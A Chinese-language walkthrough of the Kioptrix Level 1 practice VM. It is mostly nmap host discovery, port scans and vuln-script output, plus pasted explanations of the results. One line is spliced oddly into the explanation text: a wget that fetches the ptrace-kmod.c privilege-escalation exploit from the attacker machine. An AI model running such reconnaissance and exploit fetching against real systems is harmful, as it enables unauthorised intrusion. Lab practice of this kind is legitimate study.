01-Kioptix Level-1
安装
靶机打开后,打开kioptixlevel.vmx
删除下面的内容
ethernet0.connectionType = "nat"
ethernet0.addressType = "generated"
ethernet0.present = "TRUE"
ethernet0.pciSlotNumber = "32"
ethernet0.generatedAddress = "00:0c:29:23:49:96"
ethernet0.generatedAddressOffset = "0"
虚拟机导入
网络进行设置
收集靶机的IP
方式1
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c9:0e:45, IPv4: 192.168.75.145
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.75.1 00:50:56:c0:00:08 VMware, Inc.
192.168.75.2 00:50:56:f7:5d:e0 VMware, Inc.
192.168.75.147 00:0c:29:0c:9b:0b VMware, Inc.
192.168.75.254 00:50:56:f9:5c:be VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.008 seconds (127.49 hosts/sec). 4 responded
方式2
┌──(root㉿kali)-[~]
└─# netdiscover -i eth0 -r 192.168.75.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
7 Captured ARP Req/Rep packets, from 4 hosts. Total size: 420
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.75.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.75.2 00:50:56:f7:5d:e0 4 240 VMware, Inc.
192.168.75.147 00:0c:29:0c:9b:0b 1 60 VMware, Inc.
192.168.75.254 00:50:56:f9:5c:be 1 60 VMware, Inc.
zsh: suspended netdiscover -i eth0 -r 192.168.75.0/24
方式3
┌──(root㉿kali)-[~]
└─# nmap -sV -p- -O 192.168.75.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 21:16 CST
Nmap scan report for 192.168.75.147
Host is up (0.00050s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: zMYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:0C:9B:0B (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.05 seconds
主机发现
发现ip:
192.168.75.147
192.168.75.145
# 探测靶机IP地址
arp-scan -l
# 端口扫描
masscan --rate=10000 --port=0-65535 192.168.75.147
# 指纹
namp 192.168.75.147 -p 22,80,111,139,443,1024 -sV -o --version-all
# 探测靶机IP地址
nmap -sn 192.168.75.0/24
# 端口扫描
nmap --min-rate 10000 -p- 192.168.75.147
# 信息收集
nmap -sT -sC -sV -O -p22,80,111,139,443,1024 192.168.75.147
# 漏洞扫描
nmap --script=vuln -p22,80,111,139,443,1024 192.168.75.147
┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.75.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 14:59 CST
Nmap scan report for 192.168.75.1
Host is up (0.00062s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.75.2
Host is up (0.00015s latency).
MAC Address: 00:50:56:F7:5D:E0 (VMware)
Nmap scan report for 192.168.75.147
Host is up (0.00010s latency).
MAC Address: 00:0C:29:0C:9B:0B (VMware)
Nmap scan report for 192.168.75.254
Host is up (0.00018s latency).
MAC Address: 00:50:56:EC:92:9B (VMware)
Nmap scan report for 192.168.75.145
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.12 seconds
综合扫描
nmap -sS -sV -O -T5 -p 1-65535 192.168.75.147
nmap -sT -sV -O -T5 -p 1-65535 192.168.75.147
nmap -sU -sV -O -T5 -p 1-65535 192.168.75.147
nmap -sF -sV -O -T5 -p 1-65535 192.168.75.147
-sS:SYN扫描,用于快速扫描网络上的主机。
-sT:TCP连接扫描,用于确定哪些端口是开放的。
-sF:FIN扫描,用于确定哪些端口是开放的。
-sV:服务版本检测,尝试确定开放端口上运行的服务的版本。
-O:操作系统检测,尝试识别目标主机的操作系统。
-T5:设置扫描的时间模板,T5是最快的扫描速度。
-p 1-65535:指定要扫描的端口范围,从1到65535。
结果
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -O -T5 -p 1-65535 192.168.75.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 17:39 CST
Nmap scan report for 192.168.75.147
Host is up (0.00072s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:0C:9B:0B (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds
┌──(root㉿kali)-[~]
└─# nmap -sT -sV -O -T5 -p 1-65535 192.168.75.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 17:39 CST
Nmap scan report for 192.168.75.147
Host is up (0.0011s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:0C:9B:0B (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.51 seconds
┌──(root㉿kali)-[~]
└─# nmap -sU -sV -O -T5 -p 1-65535 192.168.75.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 17:44 CST
Warning: 192.168.75.147 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.75.147
Host is up (0.00047s latency).
Skipping host 192.168.75.147 due to host timeout
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 900.62 seconds
┌──(root㉿kali)-[~]
└─# nmap -sF -sV -O -T5 -p 1-65535 192.168.75.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 17:43 CST
Nmap scan report for 192.168.75.147
Host is up (0.00066s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:0C:9B:0B (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.54 seconds
nmap --min-rate 10000 -p- 192.168.128.134 最小速率10000
nmap -sF -sV -O -T5 -sC -p 1-65535 192.168.75.147
┌──(root㉿kali)-[~/work]
└─# nmap -sF -sV -O -T5 -sC -p 1-65535 192.168.75.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 21:09 CST
Nmap scan report for 192.168.75.147
Host is up (0.00067s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1026/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after: 2010-09-26T09:32:06
|_ssl-date: 2024-12-05T14:11:48+00:00; +1h01m50s from scanner time.
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:0C:9B:0B (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: 1h01m49s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.38 seconds
┌──(root㉿kali)-[~/work]
└─#
指纹探测
nmap 192.168.75.147 -p 22,80,111,139,443,1024 -sV -sC -O --version-all
┌──(root㉿kali)-[~]
└─# nmap 192.168.75.147 -p 22,80,111,139,443,1024 -sV -sC -O --version-all
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 20:06 CST
Nmap scan report for 192.168.75.147
Host is up (0.00049s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1026/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after: 2010-09-26T09:32:06
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_DES_64_CBC_WITH_MD5
|_ssl-date: 2024-12-05T13:08:39+00:00; +1h01m50s from scanner time.
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:0C:9B:0B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_clock-skew: 1h01m49s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.20 seconds
根据您提供的 nmap 扫描结果,以下是对目标主机 192.168.75.147 的扫描报告的详细解释:
目标主机状态
-
主机状态:在线(响应时间为0.00049秒的延迟)。
端口和服务信息
-
wget http://192.168.75.145:80/ptrace-kmod.c22/tcp:开放的SSH服务,版本为OpenSSH 2.9p2,协议1.99。
-
支持SSHv1。
-
包含三个密钥信息。
-
80/tcp:开放的HTTP服务,版本为Apache httpd 1.3.20,运行在Unix系统上,特别是Red Hat/Linux系统上,支持mod_ssl/2.8.4和OpenSSL/0.9.6b。
-
网站标题为“Test Page for the Apache Web Server on Red Hat Linux”。
-
支持TRACE方法,这可能存在安全风险。
-
111/tcp:开放的RPCBIND服务,版本为2。
-
提供了RPC服务信息,包括rpcbind和status服务。
-
139/tcp:开放的NetBIOS-SSN服务,由Samba smbd提供,工作组为MYGROUP。
-
443/tcp:开放的SSL/HTTPS服务,版本为Apache/1.3.20,运行在Unix系统上,特别是Red Hat/Linux系统上,支持mod_ssl/2.8.4和OpenSSL/0.9.6b。
-
返回了400 Bad Request错误。
-
提供了SSL证书信息,包括有效期和支持的SSLv2密码套件。
-
1024/tcp:开放的status服务,版本为1(RPC #100024)。
MAC地址和设备信息
-
MAC地址:00:0C:29:0C:9B:0B,由VMware提供。
-
设备类型:通用。
-
操作系统:Linux 2.4.X。
-
CPE:cpe:/o:linux:linux_kernel:2.4。
-
OS详细信息:Linux 2.4.9 - 2.4.18(可能是嵌入式系统)。
网络距离
-
网络距离:1跳。
主机脚本结果
-
时钟偏差:1小时1分49秒。
-
SMB2时间:SMB2协议协商失败。
-
NBSTAT:NetBIOS名称为KIOPTRIX,用户未知,MAC地址未知。
其他信息
-
警告:由于找不到至少一个开放和一个关闭的端口,OS扫描结果可能不可靠。
-
扫描完成:扫描了1个IP地址(1个主机在线)用时23.20秒。
报告提交
-
如果有任何扫描结果不正确,可以在 Nmap提交页面 提交更正。
这个报告提供了目标主机的详细网络服务和操作系统信息,对于网络安全审计和系统管理非常有用。
利用nmap进行漏洞探测
┌──(root㉿kali)-[~]
└─# nmap 192.168.75.147 -p 22,80,111,139,443,1024 -oA namo_ip -script vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 20:22 CST
Nmap scan report for 192.168.75.147
Host is up (0.00027s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /test.php: Test page
| /icons/: Potentially interesting directory w/ listing on 'apache/1.3.20'
| /manual/: Potentially interesting directory w/ listing on 'apache/1.3.20'
|_ /usage/: Potentially interesting folder
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| http://www.openssl.org/news/secadv_20140605.txt
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_ http://www.cvedetails.com/cve/2014-0224
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_3DES_EDE_CBC_SHA
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://www.securityfocus.com/bid/70574
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| ssl-dh-params:
| VULNERABLE:
| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
| State: VULNERABLE
| IDs: BID:74733 CVE:CVE-2015-4000
| The Transport Layer Security (TLS) protocol contains a flaw that is
| triggered when handling Diffie-Hellman key exchanges defined with
| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
| to downgrade the security of a TLS session to 512-bit export-grade
| cryptography, which is significantly weaker, allowing the attacker
| to more easily break the encryption and monitor or tamper with
| the encrypted stream.
| Disclosure date: 2015-5-19
| Check results:
| EXPORT-GRADE DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.0.x/512-bit MODP group with safe prime modulus
| Modulus Length: 512
| Generator Length: 8
| Public Key Length: 512
| References:
| https://weakdh.org
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
| https://www.securityfocus.com/bid/74733
|
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.0.x/1024-bit MODP group with safe prime modulus
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
1024/tcp open kdm
MAC Address: 00:0C:29:0C:9B:0B (VMware)
Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
Nmap done: 1 IP address (1 host up) scanned in 321.25 seconds
┌──(root㉿kali)-[~]
└─#
根据您提供的 nmap 扫描结果,以下是对目标主机 192.168.75.147 的扫描报告的详细解释:
目标主机状态
-
主机状态:在线(响应时间为0.00027秒的延迟)。
端口和服务信息
-
22/tcp:开放的SSH服务。
-
80/tcp:开放的HTTP服务。
-
/test.php:测试页面。
-
/icons/:潜在的有趣目录。
-
/manual/:潜在的有趣目录。
-
/usage/:潜在的有趣文件夹。
-
TRACE:启用了TRACE方法,可能存在安全风险。
-
XSS:未发现存储型和DOM型跨站脚本攻击(XSS)漏洞。
-
CSRF:未发现跨站请求伪造(CSRF)漏洞。
-
目录枚举:发现了几个潜在的目录列表:
-
111/tcp:开放的RPCBIND服务。
-
139/tcp:开放的NetBIOS-SSN服务。
-
443/tcp:开放的HTTPS服务。
-
1024/tcp:开放的kdm服务。
漏洞信息
-
SSL/TLS MITM 漏洞(CCS Injection):
-
状态:易受攻击。
-
风险因子:高。
-
描述:OpenSSL在处理ChangeCipherSpec消息时存在问题,允许中间人攻击者触发使用零长度主密钥,从而可能劫持会话或获取敏感信息。
-
CVE:CVE-2014-0224。
-
SSL POODLE 信息泄露:
-
状态:易受攻击。
-
ID:BID:70574, CVE:CVE-2014-3566。
-
描述:SSL协议3.0使用非确定性CBC填充,使得中间人攻击者更容易通过填充预言攻击获取明文数据。
-
CVE:CVE-2014-3566。
-
TLS协议DHE_EXPORT密码套件降级中间人攻击(Logjam):
-
状态:易受攻击。
-
ID:BID:74733, CVE:CVE-2015-4000。
-
描述:TLS协议在处理DHE_EXPORT密码套件时存在缺陷,可能允许中间人攻击者降低TLS会话的安全性至512位出口级密码学,从而更容易破坏加密并监控或篡改加密流。
-
CVE:CVE-2015-4000。
SMB漏洞
-
SMBv2漏洞(CVE-2009-3103):
-
状态:易受攻击。
-
描述:SMBv2协议实现中的数组索引错误,允许远程攻击者执行任意代码或导致拒绝服务(系统崩溃)。
-
CVE:CVE-2009-3103。
其他信息
-
MAC地址:00:0C:29:0C:9B:0B,由VMware提供。
扫描总结
-
扫描完成:扫描了1个IP地址(1个主机在线)用时321.25秒。
这个报告提供了目标主机的详细网络服务和操作系统信息,以及存在的安全漏洞。对于网络安全审计和系统管理非常有用。
┌──(root㉿kali)-[~/work]
└─# nmap 192.168.75.147 -p 22,80,111,139,443,1024 -oA namo_ip -script vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 20:30 CST
Nmap scan report for 192.168.75.147
Host is up (0.00086s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /test.php: Test page
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
| ssl-dh-params:
| VULNERABLE:
| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
| State: VULNERABLE
| IDs: BID:74733 CVE:CVE-2015-4000
| The Transport Layer Security (TLS) protocol contains a flaw that is
| triggered when handling Diffie-Hellman key exchanges defined with
| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
| to downgrade the security of a TLS session to 512-bit export-grade
| cryptography, which is significantly weaker, allowing the attacker
| to more easily break the encryption and monitor or tamper with
| the encrypted stream.
| Disclosure date: 2015-5-19
| Check results:
| EXPORT-GRADE DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.0.x/512-bit MODP group with safe prime modulus
| Modulus Length: 512
| Generator Length: 8
| Public Key Length: 512
| References:
| https://www.securityfocus.com/bid/74733
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
| https://weakdh.org
|
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.0.x/1024-bit MODP group with safe prime modulus
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_3DES_EDE_CBC_SHA
| References:
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.securityfocus.com/bid/70574
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| http://www.openssl.org/news/secadv_20140605.txt
| http://www.cvedetails.com/cve/2014-0224
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
1024/tcp open kdm
MAC Address: 00:0C:29:0C:9B:0B (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
Nmap done: 1 IP address (1 host up) scanned in 314.40 seconds
┌──(root㉿kali)-[~/work]
└─# ls
1.sh 2.sh 3.sh namo_ip.gnmap namo_ip.nmap namo_ip.xml
您已经提供了三个文件的内容,这些文件是 nmap 扫描的结果。下面是对这些文件内容的解释:
文件 namo_ip.gnmap
